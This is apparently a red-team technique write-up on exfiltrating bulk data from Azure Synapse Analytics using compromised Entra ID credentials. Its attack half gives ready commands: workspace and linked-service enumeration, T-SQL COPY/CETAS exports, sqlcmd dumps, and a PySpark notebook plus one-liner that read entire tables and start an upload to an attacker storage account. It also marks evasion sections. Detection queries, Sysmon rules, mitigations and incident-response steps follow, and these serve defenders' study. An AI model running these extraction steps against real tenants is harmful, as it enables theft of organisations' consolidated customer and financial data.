| Attribute | Details |
|---|---|
| Technique ID | COLLECT-DATA-004 |
| MITRE ATT&CK v18.1 | Transfer Data to Cloud Account (T1537) |
| Tactic | Collection, Exfiltration |
| Platforms | Entra ID (Azure) |
| Severity | Critical |
| CVE | N/A |
| Technique Status | ACTIVE |
| Last Verified | 2026-01-10 |
| Affected Versions | Azure Synapse Analytics all pool types (Serverless, Dedicated SQL, Spark), Synapse Studio 2.0+, Synapse CLI 1.0+ |
| Patched In | N/A - No patch available; depends on RBAC and network controls |
| Author | SERVTEP – Artur Pchelnikau |
Concept: Azure Synapse Analytics data exfiltration involves unauthorized access to data warehousing and big data analytics services via compromised Entra ID credentials with Synapse workspace roles (Synapse SQL Administrator, Apache Spark Administrator). An attacker can execute queries against Dedicated SQL Pools or Serverless SQL endpoints to bulk-read terabytes of data, leverage Spark notebooks to process and extract datasets, or exploit linked services containing credentials to downstream systems (Data Lake Gen2, Cosmos DB). Synapse aggregates data from multiple sources (ADLS Gen2, SQL, Cosmos DB), making it a high-value exfiltration target.
Attack Surface: Entra ID accounts with Synapse workspace roles (Synapse SQL Administrator, Synapse Contributor), Azure storage credentials in linked services, Synapse workspace connection strings, workspace authentication tokens, notebook execution credentials.
Business Impact: Bulk data warehouse compromise. Attackers access consolidated datasets including operational analytics, customer insights, financial reporting data, and historical archives. Synapse often contains aggregated views of enterprise-wide data, multiplying the impact of compromise.
Technical Context: Synapse Serverless SQL queries cost ~$5-7 per TB scanned. Large extractions (1+ TB) may incur alerting via cost anomalies but remain difficult to attribute without detailed query monitoring. Synapse Dedicated SQL Pools provide sustained throughput for bulk operations without per-query costs, enabling stealth exfiltration.
| Framework | Control / ID | Description |
|---|---|---|
| CIS Benchmark | 5.1.1, 5.1.2 | Database encryption, access control |
| DISA STIG | SV-256512 | Ensure analytics platform encryption at rest |
| NIST 800-53 | SC-13, AC-3 | Cryptographic Protection, Access Control |
| GDPR | Art. 32 | Security of Processing – Encryption, audit logs |
| DORA | Art. 9 | Protection and Prevention |
| NIS2 | Art. 21 | Cyber Risk Management Measures |
| ISO 27001 | A.10.1.3 | Segregation of duties for analytics administrators |
| ISO 27005 | Scenario: “Data warehouse breach via compromised BI credentials” | Risk of aggregate data exposure |
Supported Versions:
Tools:
# List all Synapse workspaces in subscription
az synapse workspace list --output table
# Get Synapse workspace properties
az synapse workspace show --name <workspace-name> --resource-group <rg> --query "{Location:location, DefaultDataLakeStorageAccountName:defaultDataLakeStorageAccountName}"
# List SQL pools (Dedicated)
az synapse sql pool list --workspace-name <workspace-name> --resource-group <rg> --output table
# List Spark pools
az synapse spark pool list --workspace-name <workspace-name> --resource-group <rg> --output table
# Get linked services (may contain credentials for downstream systems)
az synapse linked-service list --workspace-name <workspace-name> --output table
What to Look For:
# Connect to Azure
Connect-AzAccount
# List Synapse workspaces
Get-AzSynapseWorkspace -ResourceGroupName "<rg>"
# Get workspace SQL endpoint
$workspace = Get-AzSynapseWorkspace -ResourceGroupName "<rg>" -Name "<workspace>"
$workspace.ConnectivityEndpoints.SqlOnDemand
# List database users in SQL pool
# [Requires SQL connection to pool; see Execution Methods]
Supported Versions: Dedicated SQL Pools
Objective: Establish authenticated connection to Dedicated SQL Pool
Manual Steps:
<workspace>.sql.azuresynapse.netAzure Active Directory - Password or Azure Active Directory - IntegratedCommand (SSMS Query Window):
-- Verify connection and list databases
SELECT name FROM sys.databases;
-- Select target database
USE [database_name];
-- Query table to understand schema
SELECT TOP 100 * FROM [schema].[table_name];
-- Export all data to file (using BCP or COPY)
-- Option 1: T-SQL COPY statement (Synapse native)
COPY INTO [staging_table]
FROM 'https://<storage-account>.blob.core.windows.net/<container>/<file-path>'
WITH (
FILE_TYPE = 'PARQUET',
CREDENTIAL = (IDENTITY = 'Shared Access Signature', SECRET = '<SAS>')
)
-- Option 2: Export to ADLS Gen2 via CREATE EXTERNAL TABLE AS SELECT (CETAS)
CREATE EXTERNAL TABLE [export_table] WITH (
LOCATION = 'abfss://<container>@<storage>.dfs.core.windows.net/export/',
DATA_SOURCE = [DataLakeStorage],
FILE_FORMAT = [SynapseParquet]
)
AS SELECT * FROM [source_table];
Expected Output:
Query executed successfully. (7,234,567 rows affected)
External table 'export_table' created successfully.
Data written to: abfss://exports@data.dfs.core.windows.net/export/
Command (PowerShell):
# Connect to Data Lake storage
$storageContext = New-AzStorageContext -StorageAccountName "<storage-account>" -StorageAccountKey "<key>"
# Download exported Parquet files
Get-AzStorageBlob -Container "<container>" -Context $storageContext -Prefix "export/" | `
ForEach-Object {
Get-AzStorageBlobContent -Blob $_.Name -Container "<container>" -Context $storageContext -Destination "C:\Exports\"
}
# Convert Parquet to CSV (if needed)
# [Use PySpark or pandas library]
OpSec & Evasion:
Supported Versions: All Synapse workspace versions
Objective: Navigate to notebook editor and execute extraction code
Manual Steps:
Notebook Code (PySpark):
# Import libraries
from pyspark.sql import SparkSession
from azure.storage.blob import BlobServiceClient
import json
# Initialize Spark session
spark = SparkSession.builder.appName("DataExtraction").getOrCreate()
# Connect to Synapse SQL pool
jdbc_url = "jdbc:sqlserver://<workspace>.sql.azuresynapse.net:1433;database=<db>;encrypt=true;trustServerCertificate=false;hostNameInCertificate=*.sql.azuresynapse.net;loginTimeout=30"
connection_properties = {
"user": "<entra-id-user>@<tenant>.onmicrosoft.com",
"password": "<password>",
"driver": "com.microsoft.sqlserver.jdbc.SQLServerDriver"
}
# Read entire table into DataFrame
df = spark.read.jdbc(url=jdbc_url, table="[schema].[table_name]", properties=connection_properties)
print(f"[*] Loaded {df.count()} rows from table")
# Save to Data Lake (Parquet format)
df.write.mode("overwrite").parquet("abfss://<container>@<storage>.dfs.core.windows.net/export/table_export/")
print("[+] Data exported to Data Lake")
# Export to CSV (if needed)
df.coalesce(1).write.mode("overwrite").option("header", "true").csv("abfss://<container>@<storage>.dfs.core.windows.net/export/table_export_csv/")
print("[+] CSV export complete")
# Upload to attacker storage (using blob SDK)
connection_string = "DefaultEndpointsProtocol=https;AccountName=<attacker-storage>;AccountKey=<key>;EndpointSuffix=core.windows.net"
blob_client = BlobServiceClient.from_connection_string(connection_string)
# [Code to transfer files to attacker account]
Expected Output:
[*] Loaded 12,450,000 rows from table
[+] Data exported to Data Lake
[+] CSV export complete
Supported Versions: Azure CLI 2.50+
Command:
# Execute query on Serverless SQL pool
az synapse sql query --workspace-name <workspace> \
--sql-pool-name "Built-in" \
--sql-script "SELECT * FROM [database].[schema].[table]" \
--output json > /tmp/synapse_export.json
# Alternative: Use sqlcmd to connect
sqlcmd -S "<workspace>-ondemand.sql.azuresynapse.net" \
-U "<user>@<tenant>.onmicrosoft.com" \
-P "<password>" \
-d "<database>" \
-Q "SELECT * FROM [schema].[table]" \
-o /tmp/export.csv
Version: 19.2 (Current) Minimum Version: 18.0 Supported Platforms: Windows
Installation:
# Download from Microsoft
# https://learn.microsoft.com/en-us/sql/ssms/download-sql-server-management-studio-ssms
# Alternatively, install via Chocolatey
choco install sql-server-management-studio
Version: Included in Synapse runtime Supported Platforms: Spark notebooks in Synapse workspace
One-Liner (Full Extraction):
spark.read.jdbc("jdbc:sqlserver://<workspace>.sql.azuresynapse.net:1433;database=<db>", "[schema].[table]", {"user": "<user>", "password": "<pwd>", "driver": "com.microsoft.sqlserver.jdbc.SQLServerDriver"}).write.parquet("abfss://<container>@<storage>.dfs.core.windows.net/export/")
SPL Query:
sourcetype="azure:synapse:sql" (OperationName="SELECT" OR OperationName="CETAS")
| stats count as QueryCount, sum(RowsAffected) as TotalRows, sum(DurationMs) as TotalDurationMs by RequesterObjectId, DatabaseName, bin(TimeGenerated, 10m)
| where TotalRows > 1000000 // > 1M rows in 10 minutes
| eval DurationMin = round(TotalDurationMs / 60000, 2)
KQL Query:
AzureDiagnostics
| where Category == "SynapseSQL"
| where OperationName in ("SELECT", "CETAS", "COPY")
| summarize TotalRowsAffected = sum(RowsAffected), QueryCount = count(), TotalDurationMs = sum(DurationMs) by PrincipalObjectId, DatabaseName, bin(TimeGenerated, 10m)
| where TotalRowsAffected > 5000000 // > 5M rows in 10 minutes
| join kind=inner (
AuditLogs
| where OperationName == "Add role member to scope"
| where TargetResources[0].displayName contains "Synapse"
| project PrincipalObjectId = InitiatedBy.user.id, TimeGenerated as RoleAssignmentTime
) on PrincipalObjectId
| where TimeGenerated - RoleAssignmentTime between (0min .. 60min)
Minimum Sysmon Version: 13.0+
<Sysmon schemaversion="4.81">
<!-- Detect SSMS execution and connections to Synapse -->
<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="contains">ssms.exe</Image>
<CommandLine condition="contains">.sql.azuresynapse.net</CommandLine>
</ProcessCreate>
</RuleGroup>
<!-- Detect sqlcmd usage with Synapse endpoints -->
<RuleGroup name="" groupRelation="or">
<ProcessCreate onmatch="include">
<Image condition="contains">sqlcmd.exe</Image>
<CommandLine condition="contains">.sql.azuresynapse.net</CommandLine>
</ProcessCreate>
</RuleGroup>
<!-- Monitor network connections to Synapse SQL endpoints -->
<RuleGroup name="" groupRelation="or">
<NetworkConnect onmatch="include">
<DestinationHostname condition="contains">.sql.azuresynapse.net</DestinationHostname>
<DestinationPort condition="is">1433</DestinationPort>
</NetworkConnect>
</RuleGroup>
</Sysmon>
Alert Name: “Unusual Synapse data extraction detected”
Search-UnifiedAuditLog -Operations "Add role member to scope" -StartDate (Get-Date).AddDays(-7) -FreeText "Synapse"
# Export suspicious assignments
$assignments = Search-UnifiedAuditLog -Operations "Add role member to scope" -StartDate (Get-Date).AddDays(-7) -FreeText "Synapse"
$assignments | Where-Object { $_.AuditData -match "Synapse SQL Administrator" } | Export-Csv -Path "C:\Logs\synapse_assignments.csv"
Disable Azure AD Passthrough Authentication (Require Service Principal)
Objective: Enforce managed identity-based access only
Manual Steps (PowerShell):
# Update Synapse workspace to require service principal
Update-AzSynapseWorkspace -ResourceGroupName "rg-name" -Name "workspace-name" `
-AllowAADAuthentication $false
Implement Workspace Firewall Rules
Objective: Restrict Synapse access to corporate IP ranges
Manual Steps:
Enable Column-Level Security & Row-Level Security (RLS)
Objective: Prevent bulk data extraction even if credentials compromised
T-SQL Command:
-- Enable Row-Level Security on sensitive table
CREATE SCHEMA Security;
GO
CREATE FUNCTION Security.fn_securitypredicate(@UserId SYSNAME)
RETURNS TABLE
WITH SCHEMABINDING
AS
RETURN SELECT 1 as fn_securitypredicate_result
WHERE DATABASE_PRINCIPAL_ID() = DATABASE_PRINCIPAL_ID(@UserId);
GO
CREATE SECURITY POLICY SalesFilter
ADD FILTER PREDICATE Security.fn_securitypredicate(UserId)
ON dbo.[SalesData]
WITH (STATE = ON);
Implement Transparent Data Encryption (TDE)
Objective: Ensure exported data is encrypted at rest
Manual Steps:
Validation Command (Verify Fix):
# Verify firewall is enabled
Get-AzSynapseWorkspace -ResourceGroupName "rg-name" -Name "workspace" | Select-Object AllowAADOnlyAuthentication
# Verify TDE is enabled
Get-AzSynapseSqlPool -ResourceGroupName "rg-name" -WorkspaceName "workspace" -Name "pool" | Select-Object TransparentDataEncryption
Process Names:
ssms.exesqlcmd.exe.sql.azuresynapse.net connection stringsCloud Audit Operations:
OperationName: "SELECT" with abnormal row countsOperationName: "CETAS" (Create External Table As Select)OperationName: "Add role member to scope" with Synapse SQL Administrator roleNetwork:
*.sql.azuresynapse.net on port 1433 from non-standard IPs.dfs.core.windows.net)Cloud Logs:
AzureDiagnostics with Category == "SynapseSQL"AuditLogs with OperationName containing Synapse operationsDisk (if local extraction):
HKEY_CURRENT_USER\Software\Microsoft\SQL Server Management Studio.sql files in user temp directories1. Containment (0-5 minutes):
# Revoke Synapse roles from compromised user
Remove-AzRoleAssignment -ObjectId "<compromised-user-id>" `
-RoleDefinitionName "Synapse SQL Administrator" `
-Scope "/subscriptions/<sub-id>/resourceGroups/<rg>/providers/Microsoft.Synapse/workspaces/<workspace>"
2. Investigation (5-30 minutes):
# Query Synapse audit logs for suspicious activities
$logs = Search-UnifiedAuditLog -Operations "Execute SQL" -StartDate (Get-Date).AddHours(-24)
$logs | Where-Object { $_.AuditData -match "SELECT \*" } | Export-Csv "synapse_queries.csv"
3. Remediation (30-60 minutes):
# Reset Entra ID password for compromised user
Set-AzADUser -ObjectId "<user-id>" -Password (New-Object System.Management.Automation.PSCredential "user", (ConvertTo-SecureString "NewPassword123!" -AsPlainText -Force))
# Reset Synapse workspace master key (if data confidentiality breached)
# [Contact Microsoft Support for workspace restoration]
| Step | Phase | Technique | Description |
|---|---|---|---|
| 1 | Initial Access | [IA-PHISH-001] Device Code Phishing | Attacker phishes Entra ID user credentials |
| 2 | Privilege Escalation | [PE-ACCTMGMT-011] PIM Abuse | Attacker escalates to Synapse SQL Administrator |
| 3 | Collection | [COLLECT-DATA-004] Synapse Data Access | Attacker executes SELECT queries to extract data |
| 4 | Exfiltration | [COLLECT-DATA-001] Blob Storage Exfiltration | Data transferred to attacker’s Azure storage |
| 5 | Impact | [IMPACT-001] Data Destruction | Attacker deletes Synapse tables and audit logs |